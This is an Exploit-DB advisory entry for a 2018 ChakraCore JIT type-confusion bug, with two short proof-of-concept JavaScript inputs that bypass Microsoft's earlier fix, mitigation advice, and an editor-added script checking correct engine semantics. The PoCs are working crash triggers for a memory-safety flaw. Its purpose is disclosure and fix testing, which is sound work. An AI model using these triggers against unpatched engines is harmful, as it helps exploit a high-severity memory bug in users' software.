Vendor: ChakraCore (Microsoft)
Product Name: ChakraCore
CVSS: 8.8 (HIGH)
Type: Type Confusion
CWE: CWE-843
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
Year: 2018

Bypassing the Fix for the Bug

This Exploit-DB entry records two proof-of-concept inputs that bypass the fix Microsoft committed for a type confusion bug in ChakraCore's JIT (the commit in PR 4226 linked below). Both cases have the same shape: inside a loop that executes exactly once, a property is stored on obj, obj is converted to a primitive number with unary +, and the same property is stored again. In case 1 obj starts as a Number wrapper object holding the subnormal double 2.3023e-320 (whose raw IEEE-754 encoding is the small integer 0x1234); in case 2 it starts as the string '2.3023e-320', which + parses to the same double. The outer loop in main() calls opt() 100 times so that the function is JIT-compiled; the "repetition" is warm-up, not part of the bug. The confusion is between the object type the JIT specialised the first property store for and the primitive that the second store actually receives: a correct engine must treat a store on a primitive as a no-op (or a TypeError in strict mode), and the check added by the patch still lets this transition through.

Mitigation:

Update to a ChakraCore build that includes the follow-up fix for this bypass (the entry records that a patch exists); the commit in PR 4226 alone does not close the issue, as the two cases below demonstrate. Until then, treat execution of untrusted JavaScript on an affected ChakraCore build as exposed to a high-severity (CVSS 8.8) memory-safety bug. When testing a fix, exercise the object-to-primitive transition under the JIT, not just in the interpreter: both the Number-wrapper and the numeric-string variants must be covered.

Exploit-DB raw data:

It seems this is the patch for the bug.
https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a

The following two cases will bypass the fix.

1:
function opt() {
    // Number wrapper object holding a subnormal double (raw encoding 0x1234).
    let obj = new Number(2.3023e-320);
    // Loop that runs exactly once: the body is what the JIT compiles and specialises.
    for (let i = 0; i < 1; i++) {
        obj.x = 1;      // property store on the wrapper object
        obj = +obj;     // ToNumber: obj is now a primitive double
        obj.x = 1;      // the same store, now against a primitive
    }
}

function main() {
    // Call opt() enough times for it to be JIT-compiled.
    for (let i = 0; i < 100; i++) {
        opt();
    }
}

main();

2:
function opt() {
    // String primitive this time, not an object; + parses it to the same double.
    let obj = '2.3023e-320';
    // Loop that runs exactly once: the body is what the JIT compiles and specialises.
    for (let i = 0; i < 1; i++) {
        obj.x = 1;      // store on a string primitive (discarded in sloppy mode)
        obj = +obj;     // ToNumber: obj is now the primitive double 2.3023e-320
        obj.x = 1;      // the same store against the primitive double
    }
}

function main() {
    // Call opt() enough times for it to be JIT-compiled.
    for (let i = 0; i < 100; i++) {
        opt();
    }
}

main();
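Added example (editor's code, not part of the Exploit-DB entry and not ChakraCore code): the behaviour a correct engine must exhibit for the sequence the two cases above execute, plus a check of the raw encoding of the magic double. The names doubleBits, tryStore, referenceIteration and probe are chosen here. This is not a reproduction of the crash; it is the reference-semantics oracle you would run on a patched build next to the PoCs: the second store must leave no property on the primitive (it is discarded in sloppy mode and throws TypeError in strict mode) and the numeric value must survive the transition unchanged.

```javascript
// Added example (editor's code, not from the Exploit-DB entry or ChakraCore):
// reference semantics for the object -> primitive transition the PoCs exercise,
// plus the raw encoding of the subnormal double they use.

// Raw IEEE-754 encoding of a double, as a BigInt (assumes an engine with
// DataView.prototype.getBigUint64, i.e. ES2020 or later).
function doubleBits(x) {
  const view = new DataView(new ArrayBuffer(8));
  view.setFloat64(0, x);
  return view.getBigUint64(0);
}

// Performs `target.x = 1` and reports whether it threw. On a wrapper object the
// store creates an own property; on a primitive it is silently discarded in
// sloppy mode and raises TypeError in strict mode. Either way it must never
// become observable on the primitive itself.
function tryStore(target) {
  try {
    target.x = 1;
    return false;
  } catch (e) {
    if (!(e instanceof TypeError)) throw e;
    return true;
  }
}

// One pass through the PoC loop body, starting from `start` (a Number wrapper
// for case 1, a numeric string for case 2). Returns what the language requires
// an engine to observe at each step.
function referenceIteration(start) {
  let obj = start;
  const firstStoreThrew = tryStore(obj);
  const before = { type: typeof obj, x: obj.x }; // wrapper: object/1; string: string/undefined
  obj = +obj;                                    // ToNumber: unbox the wrapper / parse the string
  const secondStoreThrew = tryStore(obj);        // store against the primitive double
  return {
    before,
    firstStoreThrew,
    secondStoreThrew,
    afterType: typeof obj,   // must be "number"
    afterX: obj.x,           // must be undefined: the store never lands on the primitive
    value: obj,
  };
}

// Runs both cases as often as the PoC's main() does (warm enough for a JIT to
// kick in) and checks the invariants on every iteration. Returns true when the
// second store never leaked onto the primitive and the value was preserved.
function probe(iterations = 100) {
  const magic = 2.3023e-320;
  for (let i = 0; i < iterations; i++) {
    const results = [
      referenceIteration(new Number(magic)), // case 1: Number wrapper object
      referenceIteration('2.3023e-320'),     // case 2: numeric string primitive
    ];
    for (const r of results) {
      if (r.afterType !== 'number' || r.afterX !== undefined || r.value !== magic) {
        return false;
      }
    }
  }
  return true;
}

console.log('magic double bits: 0x' + doubleBits(2.3023e-320).toString(16));
console.log('reference semantics held:', probe());
```

The 0x1234 encoding is why the literal is worth noticing: a value that ends up interpreted as a pointer or length shows up in a crash dump as a recognisable marker. The probe runs the pattern on the engine you are auditing; an engine that crashes, or on which afterX is anything other than undefined after a hundred iterations, has not fixed the transition.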